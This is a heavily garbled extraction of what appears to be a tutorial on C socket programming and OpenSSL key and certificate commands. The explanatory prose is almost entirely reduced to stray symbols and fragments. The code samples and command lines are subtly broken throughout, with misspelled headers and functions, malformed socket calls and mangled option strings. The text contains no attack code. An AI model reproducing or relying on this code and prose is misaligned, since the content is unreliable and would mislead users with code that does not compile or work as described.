c 5 / = G2
C
U4
" Bind() + n 9 "
W 3 7 4 - 5< ^ P
http %# ) 4
TCP
)
A"
H)
ˆ 6" 6 1
), -
j6 3 % !
†q 7 4
B
. 2<
% !
G -, 6 U )
5
A
5<
1P
B
5!• ,
,6 5<
G2
"
( E 6-
F
) UDP TCP
/
<
6
4)
6X
Y
2 `56
H) TQ ? G
( 5 $-, 6 U )
% .$
†q
@ ,L
" 7 L bind() +
a
7 4
B( '
#include<svs/type.h>
#include<svs/sock.h>
int bind ( int soskfd , struct sockaddr_mv_addr , int addrlen )
0, -
" socket_] + " - Y
0, 6,
B
.
P " h @
L*
-,< "
5< , 6 3
< IPh @ ) 7 4 h @ $
-
3
% !
@)-
- N@
O*
0
S /
=:1"
13
@
< I
Y
' L - 5<
My_Addr `
- <
,
7
$ •ŠŠsŠ
5<
F)
4 h @ , B'
2
3
0
3
T 9 a Addr_len …
# Bind_] +
U#
wqp‹ - 5< " 7 4
0,
/
a My_Addr …
`
0,< = G C
8P
H `
a
?56a sockfd …
8P
C
H
I
b . _= 1
@2
- 5< ? !
2
, < wqps
-, < ) "
#
Y 2
6-, 6 U )
0
,6 * ?
?@
)z *
)
4 , P 5<
,
_O
6-, 6 U )
6
I INADDR_ANY
$,
, &
4 - 5<
4 2 " -" F % !
IP h @ , B'
[ ,
IP h @
5< B
. 2<
)
U#
37
b.
% !
0
c
6, B' 6
?@ ,
% ,P BE 1/
1/
Y
,
1/ ) ,
Y
N-
3 ?@
?@ HTONS_] +
, )
6a
-
) "
3
5 <" % P
H
"
' Bind_] % 5! - N@ , < u $ :3 \ A"
0,
4
,
#
("c
2
"
4 5<
?@
5<
G
, % ,P
3
,6 3 "
H
#_
O*
Bind_]
0
,6 3
-
?@ % 1 0,<
N
- N@
2#5
0
-
_z
…w ,
_-
G ,<
) - P& @
PEAAOR_] + ) :3 - 5< Errno
:3 7 L*
a Listen_]+
(8! -
^P
% !
+ 2 b
TCP ^ P
6X
0
),
7 P!
_+
N I )-
=
I.1 $-, 6 U )
, 6, 7
4h @
+ b
0,6,
G] , G
? I
R
H 6U)
) " ) T G'7 9P
@"
=
a
"7
% !
,
(8!
) -
<
7 4 - 5<
H
X
,
Q ,/
@)- 5
,G Q,/
6X
I.12 "
", - " U4
TCP ^ P
@^P )$
b'+ 2
TCP ^ P
0
F? "
2,
A)
G -, 6 U )
2#5
? " 6 9
F
7) Y
) 4
, , ,
% !
2
H
B
/
#
< (8! % !
+
#@
,
Listen_]
B ( '0,< W 3 7 4 - 5<
Int listen (int sockfd , int back log ) ;
0, -
E
?@ ,
L*
?56a Sockfd …
5
"
0 I -, < =
0
erno u )
,G Q ,/ a Backlog …
) nB
G 7 9P
, 6 3 …w+ 2
,
backlog ,
-,< ),. pq
:3 ")
7
B
P
H+
0,<
- ,3
, 56
:3 - 5<
Accept +
a < H ?@ ( Y
-
<
)
_] +
) 4 TCP ^ P
6
H) 0 <
2 "
,
M 9
7 B
5!
, PB
:
+ b
% !
>/
/
@)L*
T)
L*
F accept
accept()
0,<
0,6,
% 1 2 56 ,6, ( E
5< E
()
L*
nB
G 7 9P "
I
-,< =
- Y nB
G 7 9P "
7 9P %
-,< =
("c
0,
, accept()
) -, @
2 7) Y 0
# A R4
T)
L*
2
) 7 !89 T
0,<
6X
2
€
- Y
] )
# -,< =
, ,F
accept() +
, " U4
<
O*
% !
0,
, + 2
$ ' R4 _ F) 7
# nB
G 7 9P 2 " ,
, ,F
5<
"
,< F listen_] +
X
" 5<
) 4 7 L*
@)-
I
< - N nB
G ) -,< =
X
% .%
),
)
'
7 9P "
" _=1
/
()
" _O
# L*
a
0,
2 0,
"7
+
B( '
#include <sys/socket.h>
int accept ( int sockfd , void*addr , *addrlen ) ;
0
T
Socket _] +
-, @
+ 2
M 9 IP h @ ) 7
4? !
2
L*
@ 5<
4 h @ nB
G^P
0,< 'G C
8P
H #
,
3
- < a Addr …
`
A R4 " U4 % !
0,
5<
S / addr
a Sockfd …
?@
`
,
^P %
T 9 a Addrlen …
H- Y
u
,G
1)
:3 ?@ - 5 <
a
L*
-
Ÿ
+ 2
,
:3 , < _…w]
,
0
% H errno
,6 3 ,
B ?,< 2<)
0
"(5
TQ
#include <string.h>
include <sys/type.h>
#include <sys/type.h>
#Define Myport 3490 /* the port user will be connecting to */
# define BACKLOG 10/*how many pending connections will hold*/
main()
{
int sockfd, new_fd;/* listen on sock_fd, new connection on new_fd*/
struct sockaddr_in my_addr;/* connector’s address information*/
if (( sockdf=socket(AF_INET,SOCK_STREAM,.)!= NULL){
my_addr.sin_family=AF_INET;/*host byte order*/
my_addr.sin_addr.s_addr= INADDR_ANY;/*auto-fill with my IP*/
bzero (&(my_addr.sin_zero),8) /*zero the, rest of the struct*/
if
(bind
(sockfd,(struct
sockaddr*)&my_addr,
sizeof
(struct
sockaddr))!=1-){
listen (sockfd, BACKLOG);
sin_size=sizeof (struct sockaddr_in);
new_fd= accept (sockfd, & their_ addr,&sin_size);
, ,F
"
60,
'
- Y $
T
,
N
accept()+ b
N
?@ L *
recv()) send() +
)-
- Y % H
5
a
) -, 6 U )
"7
+ )
5
+ ) 2
B ( '0,
6-
1P
Int Send (int sock fd, const void_msg, int len, int flags);
Int recv(int sockfd,void_buf, int len, unsigned int flags);
0
-,< z *
E@ "
accept() + "
-, @
1
60, <
_ `
T
0
Y ?@
b' 6
B
. a Msg …
@ %Q] I'/
H TCP
) '
S /
'
2
;.
5 iX
a Sockfd …
L*
" -
1
,B'?)
)
T 9 a Len …
6-
a Flag …
, `4 " & 6 4
0, RN
'
6-
B
. h @ recv() +
I'/
0
7
1
)
0,
, 6 3 …w :3
d*
X
S /
len
u
6")
'
,G
-,
"
) '
7
1
'
4 2 a Buf …
H E@
+ ) 2
6
,
,G $ PQ ,!
1
,G
2#5
,
H
0,<P? # , +
,
H wqqq , len
1
), -
] 1
6-
%
"
†qq 7
0, d *
5< ,
2
@=B
# ,
send() + b
T /, # T
u
6-
e 'TQ ? !
0, < pqq
5<
-,
-,
E/ ,
H _ '
G B
/
6 a
0,<
\
? 6-
6
)
A /)
b 'recv() ) send() + a #
' )T
) UDP A)
(
B
, 63
1
)
œ,
P
, ,
T
shutdown()) close() +
, 5
'
T
-
0, , P
) < N"
^P ,
^P
,< M 9 ? "
,
, < "
"
? " 6 B', 562# 1
)
a
close()+
"7
B( '
close (int sockfd) ;
+
L*
+ b
,<
? 56
sockdf
L*
0,< ,6 3
- Y % H
'
2 0 I
&
)T
a Socfd …
L*
,
H 0
accept()
-,
socket()
I ) nB
G 7 9P ( 5
N
close() + b
<
9P
0
% !
7 9P =
a
TCP 7 9P "
),
A"
4
$-
#
TP
H
/
,,P
N ^P
-
X
6
?@
F ,
0,
'X nB
G
?@ B ( ' ,<P shutdown() +
"7
,6 *
2
N -
Int shutdown (int sockdf, int how);
0 I
a
" ? `56$-
R4
" ,
T
1
) "
0,
6-
"@
'
"@
8
C
g
-
' a Y
) ) '% !
2#5
g
-
2#5
g
'
, 6 3 …w +
2
,
0,
_TCP %# ) 4
.
a,
-, 6 U )
H- Y
5
,
G
A"
:3 ")
4
0
aw , …
0
" ? `56
)T
ap , …
%5! close() +
0, 5
u )
, …
T
F) 3 ' % !
-
A) a How …
2
^
"
^
, 56 1/ 2 0 <
#
2#5
?@
1/
0,
"
a Sockfd …
L*
7
B
P
H+
, 56
:3 - 5< errno
P]
- Y
4+
, , < 'G
5
P,
+
G
T/ 0, <
E
- Y
+ "
#
0, )
+ 2
F)
-, 6 U )
) Yˆ 6 E
0,
Y -, 6 U )
<
5
connect() + b
(E
,
F)
5
- Y
6-
^P
H
%5! 2
< ' R4 X
'
0, , Pshutdown ()
socked_]
X
-, 6 U )
C
5
"
2
0,< ,6 3 0,
CH , _=1
- Y ,< 'G B
P
H j*
0
?@ ) ,
,
( N6
_O
, < I
,H
iX
recv() ) send() +
)T
close () + b
5
" _z
-,< E ^ P C
_
connect +
)
<
listen () +
0
connect () + " -, 6 U )
- Y
) ,< -,< F I
,6 3 & @
' +
2<
^P
) -, 6 U )
E - N@ , < -,<
a
H
accept () )
3 '
connect () +
"7
B( '
#include <sys/types.h>
#include <sys/socket.h>
int connect (int socket, struct sockadr* serv_ addr, int addrleny);
0
Socket() +
-, @
`
2
3 '
Sockdf \ "
0, < 'G C
8PH
0,< ,6 3 2 G ,L
/
?
),
#B,
- 5 <2
%L
,
? !
h @%
5<
5
S /
I
),
0,
?
O*
5<
-, 6 U )
/
(8! %
`
a Serv_addr …
0
2< IP h @
-" , : Addrlen …
B
P
H `
H sizeof(struct sockaddr)
-, 6 U )
4 h @ ? 56
a SOCKDF …
7 4 h @ ) ,L
'G
0
% !
L*
3 7 4 h @ 5<
5<
,
42
H
# 2
' L 7 4 - 5<
H)
v 4
,
8
C
R4
X
3
9
5
2 -, 6 U )
), <
-
O*
% !
,6 3
M 9
&
3 7 4 h @ $^ P -,
\) <
^P ,
,< d *
)
[,
C
G:H -, 6 U )
7 4
0, 5 \) <
, 6 3 …w + 2
TCP ^ P
,
0,<
H
-
:3 - 5< errno
Ÿ
UDP A)
a(
,
,
(E (
T /0
\
A R4 )
) UDP A)
\
' (,! 7
'
u )
'
'
)T
)T
$T
+
?
7
0
-, 6 U )
socket () +
4
3 '
2 0,
E (
5
…
\ "
_=1
0 < ( E SOCK_DGAM
_ bind() +
'
-
]0, 6,
GH
h @] š
,P
P
]0,
? I
6-
7 4 h @ -,< E
'
I ,
'X
h @ ,< A"
4) '
-
0
,6 3
R4 ?# T
0 < ( E sendto()) recvfrom()+
B
_O
ˆ 6?), _z
H) _,6 5
(
GT
) -,< d * _7 4 )IP
\
'
0, , P
)T
-,< E
C
_
5
4 ) socket
4) socket() +
] 0,
E (
…
\ "
_=1
_ SOCK_ DGRAM]
0, 5 T
-, 6 U )
, 6, 5
)T
5
G 6-
0, 5 T
? 6'
-
$, <
#
<,
N ,
'X
1
ˆ6?), ,< "
-, 6 U )
"
0, , P
"7
(
5
P-
5<
"
'
-,< E
T
6_O
# H)
-, < 3 < -, 6 U )
0, 6, ( E
a
-
+
_z
B( '
Int send to (int sockfd, connect void* msg, int len, unsigled int flags,
const struct_to, int tolen);
0
z *
F socket() +
-, @
E@ "
1
6-
(
2
0
-, 6 U )
Y
d*
3
7
?@
H UDP
) '
0
0, N I
H %. h @ a Msg …
I'/ ( 4 2 '
0 <T
S /
?@ C
8G'$;.
?)
4 - 5 < 2 `56) , L
a Flags …
, ` 4 " &6 4
2<
a TO …
`
IP h @ ,
^
) -,<
( 4 T 9 a Len …
1
Sockaddr \ "
8PH
C
a sockfd …
L*
`
0 < I
size
,
sockaddr `
?@ ,
I of (struct sockaddr)
0
T
,G send() + , 56+ 2
n' % !
,
,
2
:3 , < _…w]
# -,< T
6
T
,
,G , 6X
,
errno
# 6" 0, 5
0,<
B
/
")
B1
T 9 a Tolen …
H 0
u
@T
2 `56) -
"7
-,< ?@
:3 - 5<
X
,G
3
2 C
5/
0, N I
a
,
(
P-
B
'
+
&
B( '
Int recv from (int sockfd, void buf, int len, unsigned int flags, struct
sockaddr_ from, int_ from len );
0
,6 3
-, @
H %. ?@
F socket () +
'
6-
(
% !
L*
I'/ "
a Sockfd …
B
. h @ a Buf …
0
_
S / ]
< '
,
4 T 9 a Len …
) ,<
?@
3
5<
) I ,P
socaddr \ "
`
a From …
7 4 h @ ) IP h @ 7 L*
?@ % !
8PH
C
0,
0,
0
A"
4
-,
I
?@ % !
42 0
-,< '
Y
?@ a Flag …
`
T 9 a Len …
,G & + 2
0
/
56
,
'
a #P
<
#P<
,
0
63i
6 6
N +
@2 5
"
, Y+
-,< 'G 5
3
6-
0,
+
6, @
"
g
),Y
a getpeename() +
include<sys/socket.h>
int getpeername(int sockfd, struct sockaddr_addr, int_addrlen);
) 47
4 h @ ) IP h @ % < $%
-, < = G % •7
+ 2
M 9
6
6,
+ 2 " - Y
4 0, 5 z *
^P %
M 9
a
I
2 0
-,< = G ?@
0,< ,6 3 4 %
3
8P
C
H
sockdaddr \ "
M 9 7 4 h @ ) IP h @
% !
.sockaddr
u
)
, 6 3 _…w]
,
`
l '+
n 9"
@ C5 / ,
?@ ,
A
'U
LE \ " 5 < 2 <
0,
: Sockdf …
`
a Addr …
b
`
T 9 a Addrlen …
' (, ! 7
:3 - 5< errno
0,< ,6 3 I :3 \
h @ ) IP h @ S
L*
2#5
)
% ,P ,< - < ?@
#
BE 7
7 4
Š j*
G
gethostname () +
( 2 $,
,6 3
$ <
F ?@ )
_ www.ibm.com C
8Q) ?@ IP h @
5<
< ( + 2
2< 2 5 (
a
TG
<
"7
+
B( '
#include <unistd.h>
int gethostname(char *hostname, size_ );
U4
_
<
7 P
!
] 6
"
0,< ,6 3 - 3• E @
0
:3 - 5 < % P
H , 56errno
0
2
, )-
")
,6 3 Y
-, 6 U )
-" / (
,
G 0, 5
) ,L
a
b.
3
E
< E
,
)#
K
1Q
- Y ?@ IP h @ " C
5
e '2# 1) ,
h @? !
N
8P
C
H
X
N56
,
1
)
#B
5! " 9 ) DNS
5F
H
5<
,
DNS
@ 5F
0,< ;. ?@
^P
< T 9 a Size …
, , %5! l '+
'?@ H) E
" "
:3 ,< _…w]
0, 5 - Y
W 3 2<
2< ( +
S /
a -" /
-,
a Hostname …
@
-, 6 U )
" B( '
-" / ( h @ ,
,@
2
#include <netdb.h>
struct hosten * gethostbyname(const char * name);
0-, 6 U )
7
?@
3
hostent \ "
< a Name …
-" / (
`
h @ $+
a
,
-,< = G "
Struct hostent
Char *h_name
Char *_name
Char **h_aliases
Length ; ¡Int h
Char
**h_addr_list;
};
8Q
C
, 6 3 -" / (
< 2
#P<
] 2<
( a Hname …
5
_www.ibm.com
_ <
,
, B'2
#P<
3 wq
< 2 ] 2<
, <- <
( a H_aliases …
G
3 a H_addrtype …
N 56] h @ -
_0 < ,6 3 AF_INTEL
S / h @ T 9 a H_Length …
-, 6 U )
2<
^
IP h @ ?@
0 <
,
`
),
`
I errno
<
0,
- <
u
$?
&@
- <
B
PH +
M83
)
$?
u
0 <
'
:3 \ =
‰9
< 2 0
c +
&@
' 7
2
NULL , 7
herror
5
) X TQ
3 |q
' 7
,6 3
I
I
H _ addr_list…
<
u ?@
H
g
)
2
g
+ 25X
F) + 2
H
,
F ) ,< ,6 *
herror() 5
a,
H
)
+'
"
F)
#include <stdio.h>
#include <stdio.h>
#includer < errno.h>
#hnclude <netdb.h>
#include <sys/types.h>
#int main (int argc, char * argv[])
{
struct hosten * h;
if(argc!=2){/*error check the command line*/
fprintf (stderr,” usage: getip address\n” );
exit(1);
}
if(h=gethostbyname(argv[]))==NULL){/*get the host info*/
herro(“ gethostbyname****_;
exite(1);
}
printf(**** host name :%s\n” ,h-h_name);
printf(“ IP Address :%n” , inet_ntoa(*((struct in _ addr * )h-h addr)));
return.;
}
E )-
'
) )? !
0,
k
F) 3 )
'b3 )
(
' Enter , B) <
) IP h @
7 L*
a
?
getip
-" / ( h @
7
2 (
?@ 5F
" A" c
" 7#
2, l '
9_=1
13 B '
-" / (
B
F
U
)-
Œ
aTQ 0, 6
$getip www. Ibm . com
,
IP
+H ) h-addr-list u
6)
@
#P<
, -, < - 3•BE 7
( Y
:
' -
<
L
1
)
<
?@ T)
1/
F) 3 ) k
T G IPh @_O
-" / ( h @
3 |q ,
<
b '5 < ,
h @ % ,P
7
6
l'
8G'
C
0, , "
inet_ntoa() + " _pws 0w{q 0w†}žw‹q C
8Q]
0
in_ \ " `
P
E 2
?@
0
) )?
@ inet_ntoa() +
) ,< = G ?@
3
-,<
•\ nP
: • %5!_z
%L' ,
addr
5
3 lY %5!
1
)
2 5>
) )
4
"
•\ nP: • %5!
0, '
U +\
SSL i '
_Secure Socket Layer^
a – N&
5
3 6
T
F 2 7 !89 T P
'9
6,
) 6-
0, , < / 9 78#
2
"
-,5! %#
5 $ 6-
N
?,< nK'
"
. " ,
N&
P
! 78#
2 0,
'
P
! -,5!
N& …
?
6? # )
" ,
6
& , B)
,B
,
F )
, ,F
0
6
6
( ?
21
) 0,
) )
?@ c
!
0
* & (
) "
N & A) )
6 P. % H 6 ) "
?@ () %#
F
N& …
N & , B?
, B T P A) 2 %#
7
2 T
%#
0, <
- 4 1
g CP
6(
6
P . m.1
&
3 b' ,
F ?@
-
0,
F
A) 2
F
j
& " 0,<
&
A
L3 , B
) M 9 " ( u4
,
Gœ
L3 , B)
#
& ) -,< B
),
, < 2t5:
F
N& … %#<
N& A)
6-
.
!89 , 6 * ? N
'
n 9
@ ? )@
5! , B " ? N ) , & A
? 59 ?
6?
<& , B ) 2 "
,
T
3
, B)
N,56 ) "
N ,B ,B
5! , B
)
bP
1
< 6 V
?
5! , B
) -,
N & A) )
?
,
,
6 #P
<
<) 0-,
a" ,
–
0
2#5
L3 , B 0 <
2
5! , B
?@ , Z>
- Y ( u4 ? "
5! , B n P
: A) 2
0 <
?@ , * ,
u4 ,6 *
?@ D
B %#
A
0
,B 3
" %#
2 %/
x
0
5! , B k
F
%
/
0,< \,
?
5!
N& …p %#<
N
% H"E g
6
'L ?
E/ ?
F b
,B
&
5! , B
-,< T, )
1
, B" - Y
!
'L ?
,
-,
m .1 ?
, B 0,
0 <
-
U
),
7 !89 % ?@ " - Y
?@ N
7 !89 ? & n 9 "
,
&
7 !89
N
6
H- Y
. …
. "
I
. 0,<P '
N1, @
7 !89 • &
'7 !89 - 56)
'L ?
<
&
-,
, B 0A
L3
0,
&
6-
5 0
%
/ -,
-, < T
'
$7) Y
7
L3 , B %
? "@
-,
Hash
5
6-
,
,
'
&
0 <
-
1E
,4),
> 0
' B ( u4 - 56
5 …
5 "
L3 _ 1 E
( u4 ) ?
?
6( u4 Hash
/? & ) 1
?@ Hash +
6 u4
m .1 , < ? # Hash
L3 , B
? 56
6
2#5
I
,
P.
> ]
<
7) Y Hash
g
P .
-,
'
> U
7
),
O /
$,
6
( u4 Hash
'
) 2 ),
,
'
" -,
'
0 <
6-
5
5!, B
1E
" / 6-
5
)
F ) ( 4 n,L …
?@ b
6
L3 , B
L.
P! ?& )
<
, h
F n,L
F n, L
0
@
F
? "@" - Y
,
,
1E
6
b
F 6
Q
1/
<
$ <
( E
P! 5B )
6
5! , B
bP
( u4 n, L 0
6
- Y -, <
(E 9
,#
c 5G %5!
C
0
6-
<
( E
6-
™Y/ 6-
4
•A) ) S
n, L ( u4 , P
0
F
L3 , B 2< ?@ h
5 ) ( u4 n, L +H )
A"
F n,L
d*
, ,F -
()&B) ("c 6)
#1 " ? 59 ?& h
5
5
5 0, N,#
, A" ( u4 ,P n,L
6
0
-, !
6
5! , B] ,
6
T.
6
?
v ')
3
U)
?
2 4 i:
N
1P 0, <
60,
b
0
2
6
3 = D) ,
6
2 " M, 6, 6 % #
S
, $?
@
6
- E"
U)
6
?@
U)
) _= B*
6
U)
0,<
5 ™Y/ 2 X
YD)
6
%3
6
U)
F
6
,
?@ -,
6
U)
6
S
BB S
"
U)
F
2 0_, ,
6
U)
- 4]
…
A
W L*
2
),
-
,
P
G< 2 3@ " 6
6
> )( % <
6
> 0 <
Z> A 3
a SSL %•) 4
H- Y
#P< )
TCP/IP % # ) 4
c
c
6-
TCP/IP %# ) 4
)T
HTTP) LDAP) IMAP ,
6% # ) 4 )
0, <
F
SSL %# ) 4 …‹ %#<
c" c )
3
6
c"
,6
-" F SSL
BH
<
-,6
l '%#<
!89 ) , 5
E
,
)
F
N& 2 T L
SSL
U)
U)
M 9)
5! , B ) 6
%
BH 2 a SSL -, 6 U )
&'(
P! "
0, 5 %
5! , B
,6
-" F
-,<, 7
67 P
[ …
/ ? 59 )
N&
T
U)
a,
?# 2
9 ?56
SSL 0, @
)
R 4 ? # & % 5! 2 U #!] , 5 7 P
[ SSL
2 `56œ_
?
2 4 SSL
,
6"
,6
# " - Y
$ )
6
),
&
,
,
0
U)
6
,6
H
2 `560, 5 %
3 5! % H 6
),
BH 2 a SSL
-" F )
/ ? 59
&
1
U)
67 P[
0, 5 ,
,6
-" F
U)
) )
&'(
BH 2 a SSL 2 TL
)
0, 5 1P -,< & 7
) SSL Record protocol a
= G
6-
SSL
( u4 1P
$ 6( u4 2
%# ) 4 protocol SSL Handshake
% # ) 4 " - Y - . & SSL
1P " M, 60, 5
SSL
= G
9 P %# ) 4 0,
)
)
U)
a
0
?@ M 9 )
6
9
)
!89
K
&F % # ) 4 ) " SSL % # ) 4
-, < % #
'SSL
T
?
)
U)
" M ,6
U)
b
6
)
67 P
[
N&
N1O *
0,
_
3] )
U)
<,B
5! , B
,
- Y
U)
< , B)
5! , B
N& %
" g@ SSL Handshake ( u4
5! , B " - Y
<,B 3
( u4
&
U)
SSL
-" F )
B
F
6
)
N & TL
N& "
0,<
A 3
G F " ? 59 ) 6)
5! , B
G
U)
U
& $ 6-
? )@
67 P[ % < ,
9P %# ) 4
P
SSL % # ) 4
<,B
K
,6, -" F )
E
SSL
$
0,6
67 P
[
N& " - Y
SSL -,<
0, 5
P 4
N&
2t
5:
6
%# ) 4 " '2 0
œ, 5 7 P
[
U)
&
" '2 0
, B 2 0,6
H- Y
0,<
a, -,< - )@
"
83
9
%/
2
'L
-
T
$&
"
SSL *
N1- Y
SSL ^ P
U)
- 5< )
)
U)
!89 N ) -,<, 1
0, 5
U)
3 6
U)
6
3
)
-)8!
,< Y T) B
/
,<
U)
!89 &
6,
"
0, 5
0,
)
6-, < T
N& T L
E ?#
)
,
b
T
T
&
!89 " - Y
(8!
,
U)
7P
[ )
6
0, 5
0
'
N1
( ')
F
)@
& ) -,< 1P T.
&
)
6-
5! , B
E
T
)
0, 5
,B
-)8!
0,
U)
T
6,
g
- Y
U)
)
G
œ,
,< 3 6
)
,< -
5 3 TL
1
)
,
. ,B
&
F)
U)
1
)
. ,B
?@ -,< &
67 P[
3
)
- 56 -,< Z> ( u4
U)
,
" - Y
?@ ) -
)
1
)
67 P
[
.
3
U)
6
A 3
L3 , B " )
)
0, 5
U)
7
2
0, 5
, 5
,1
1P SSL
?
?@ " - Y
? 59 T
T9
B
F, B 1
)
. , B" - Y
T9
!89 0,<
B
F
2 `56œ <
( u4
. 2'
& )
u"
U)
?
) )
)
<,B
N& , B 2 " - Y
G -,< 1P 7 !89
0
B
F, B B )
T
6( u4
,6
\89 )
9 P " '2' ? 4
-, < &
u4 B )
( u4
U
G F"
%
/
U)
œ,<, 6 3 &
0, 5
0,<
9P " '2 ' ? 4
,
'
u4
U)
& )
U)
0
SSL
-,< <R V <
G F " ? 59 )
B
F , B ) -,
& $? )@
SSL
(5
&
B
F, B 2 " )
0, 5
6,
2
G
g
)
$,
- Y
,< -
U)
5 3 TL
,
. ,B
&
1
)
9P " '
- Y
67 P[
U)
6
A 3
)
3
6-
)
0, 5
U)
L3 , B " )
7
0, 5
, 5
,1
B
F, B 1
)
1P SSL
" ?
B
F
?@ " - Y
? 59 T
T9
. , B" - Y
T9
!89 0,<
2 `56a <
( u4
U)
?
N& )
. 2'
u"
) )
)
<,B
N& , B 2 " - Y
G -, < 1P 7 !89
GF
0
B
F, B B
0, 5
T
0,<
U)
6( u4
,6
\89 )
9P " '2' ? 4
0
,
SSL
-, < <R V <
G F " ? 59 )
&
u4 B )
-,< & ( u4
9P " '2' ? 4
$? )@
'
U
u4
B
F , B ) -,
U)
U)
&
B
F, B 2 " )
- Y
a )
9 ?560
6 ,
)
T
T
6 )
" ,
6
"
)
U)
3 6
" - Y
U)
)
SSL
6,
SSL
6,
P! ? "
0
Fv
s B
/
+:H
6,
667 P
[
U)
&'(
0, 5 7 P
[
U)
U)
)
,< Y SSL 9P " '
)
&'(
a,
6
)
SSL 9P " '
(5
&
/
a,< , 6 3 &
0, 5
" p B
/
%
€
0, 5
'
P
Qv 4
"
6
@
PG )
, @ ',< -,< —>
A 3
6
0,
6€,<
U)
2G
5! % H 6
12 0
6
3 5! % H 6
-,
( 2
0
3
1
&
6
U)
)
,
- )@
-,
6,<P
6
" ,G )
),
6
&
6, #
)
# ) #1 >
"
6
7 !89
) ,< -
: -, < - Y
)
,
u 6
6
)
1
5! , B @
: )
# ) #1 >
),
(
&
b
?@
>
L3 , B
6
0,< ,6 * ,
)
)
6
-,< +H )
)
U)
(
#P
< ?56
P
Q l '7c
(5
a
(E
*
+
"
6
2 " - Y
6, B E …
CRL ) CSR $ 6
,
( u4 -, #
&
E SSL
Shell n 9 "
0,<
DSA ) DH $ RSA
x.509
C
GH )
openssl
7 # " - Y
?
@
v 4
0,< ,6 *
OpenSSL
0,
?@ ,6 *
&
>
,
,
5! , B " - Y
-,< • 6
g
3
6
B
/ 2 €
0
2
&
U)
1 ( 2
),
0, 5
5! , B
,
TL 7
),
6
@
" DN ,B'
1 -, @ 6
< 5 ,
-,
1SSL
0, 5 'X
€,
6
"
&
6)
),
?@ N
&
),
R4
3 5! % H 6
U)
),
6
N1 B )
TLS ) SSL
E …
P. …
& )?
U)
?
…
S/MIME -,< &
6( u4
, …
a
openssl
"
) )
& …
'
Openssl command [ command_opts ][ command_args ]
2G
-
#B
5! \
,<
Y?
" –
0,
- 56
N -
7
6
@"
" - Y
&
1/ 6
,
)
;!
2 0 <
&
U)
?
passphrase
2 ?
)
)
S F ( 5 ?, E
,
) )
?, <
?
- Y
7
passout
" (,
"
6S
6
"
passin
R 10, <
0
<
6
, B2
<
"
passphrase
^
<
F?
5
# &' >/ passphrase
5L ?# 2 " - Y
6
& "
'
& b
passphrase 5B
0
d*
,
<
?
)
_ F) 3
passphrase
) )" ^
a
"
& ) 2
openssl
4? !
- Y passphrase 7 P! " …pass : passphrase
0 <
0 <
- Y passphrase ?, 3
" 0 < - Y ? &56 9
( 5 % < T)
L3 , B
6)
<
,< passphrase
# ?
1/ 2
6 6
)
F ( N6
] passout- passin
S
L3 , B
-" , -
0,
)
# " %P
H
6
G ?, 2 0
Y
2
" ?
L3 , B 2 " -,< , 1
2
,
3
%
L3 , B 2 " - Y
F ( N6 < - Y U )
9
6
2
N M 9 " 0,<P - Y % H ?,< -, " 7
,
M 9"
7
passphrase ,
^
&
",
2 ( 5 x509 ) genrsa req , rsa
"
H
P
10,
$, , 1 CSR
2 U
3b
6
#
0 5 - Y
),
0 < >
(E ?
, 1 ( N60 < - <
2 0
6
4
PU )
3
' )
0
),G -,!" - Y
("c SSL
),
0 <-
command
,G
L3 , B
, 5 T
2
< ,
- Y var :.
u
, " - env : var
pathname % 'T) : " -file : pathname
…passout ) …Passin & )
% ' "
0 <
passphrase ?,
3
()
) ) passphrase ?,
: " )
3
T) :
0 <
- Y passphrase ?,
3 , < number ?@ M G - 5<
- Y
F) 3
B'" -fd : number
0 <
e 'j 4
& "
#B
5! 2
<
>G - 56
manual 7 .Y
-, 3
,
) )" 9
0,<
5 stdin " - Y
Passphrase - stdin
"
x509 ) rep , rsa , genrsa 7
7
2
0 <
U4
,G
-
6 5 H
iX
@ T) ,
0
6
F)
@
a genres
%# <
2
RSA
B ( '0 )
L3 , B , 1
2
0,<
"
Openssl genrsa [-out filename] [-passout arg] [-des] [-des3] [-idea] [-f4]
[-3] [-rand file (s)] [numbits]
aT) ,
-out filename
<
< ?@
F) 3
L3 , B
- Y
F) 3 % '(
& 2 "
0,
<
-idea − des3 -des
&
IDEA
DES3, DES
0,
- Y
6 &
6
d*
< stdout
N1"
# "
L3 , B ?
-passout arg
DES3, DES
?
d*
a,
0
N1"
# "
$ <- Y , B ?
0 <
numbits
6
- Y
& 2 "
Šwp ?@ e Y 4 ,
, 1 passphrase ?), )
IDEA
&
F) 3 % 'passphrase
›,
d*
wqp‹ T 9
, BT 9
L3 , B
"
openssl genrsa - out rsakey. Pem 1024
) DES3
N1 -, < &
wqp‹ T 9
L3 , B
a,
"
, 1 W 3 passphrase
openssl ganrsa - out rsakey. Pem - passout pass : enter –pass-here-des 3
1024
a rsa
?
2 " - Y
6, B' ,
0
u
a,<
0)
@
. 0
" %#<
RSA
6, B
% ,P N
'
2
,
B ( '0 5 -,6
2
' "
6, B
, B =B*
opinsslrsa[− inf orm PEM NET DER][−outformPEM NET DER][−in filename][− pa sin arg]
[−out filename][− passoutarg][−sgckey][−des][−des3][−idea][idea][−text][−noout][− modulus]
[−check][− pubin][− pubout]
aT) ,
- inform
NER, PEM ,
,
NER, PEM?
,
d*
,
2 G
L3 , B
) )"
F) 3 , B
) ), B
% <
- Y
& 2 "
?@ paaaphrase , < -, < &
&
'
) )% '
0 <
- passin arg d *
'
PEM ?@ e Y 4 , 0,< DER
0
- infilename ,
) ), B
PEM ?@ e Y 4 , 0,< DER
0
- outform
2 G
6 &
-, 3
) ),B
0 <
- out filename "
0,
d*
<
,
-,< < ?@
F) 3
L3 , B
F) 3 , B
B'
- Y
& 2
0 <
- passout arg d *
?@ passphrase , < -, < &
&
F) 3 , B
0 <
− des − des 3 − idea
?
IDEA
&
DES, DES
6
0,
- text
7
-, < ,
1/
- noout
F) 3
- Y
-)8!
0,
N1"
# "
L3 , B
L3 , B
'
F) 3
& -
L3 , B 6,B'-,< , ( ' & 2 "
Y
0, < 5
- modulus
0,
0,
V4
6D F) 3
L3 , B
6,B'
6D
, B modulus 5 H
passphrase
"
Opnssl rsa –in inkey. Pem- passin file: pass- file- out outkey. Pem
-,
3
,
) ) " passphrase] ,
&
L3 , B
"
a_ <
openssl rsa- in inkey. Pem –des3 out outkey. Pem
a,6
?
L3 , B
7
.
"
openssl rsa-in inkey. Pem – text - noout
a req
, B, 1
?@ " ?
a,<
,
60 <
" %#<
2
- Y CSR
,
B ( '0 5 - Y &
2 "
6
)
L3
opensslrep[−inf otmPEM DER][−outformPEM[−in filename][− passinarg][−out filename]
[− passoutarg][−text][−noot][−noout][−verify][− modulus][−new][−rand file(s)]
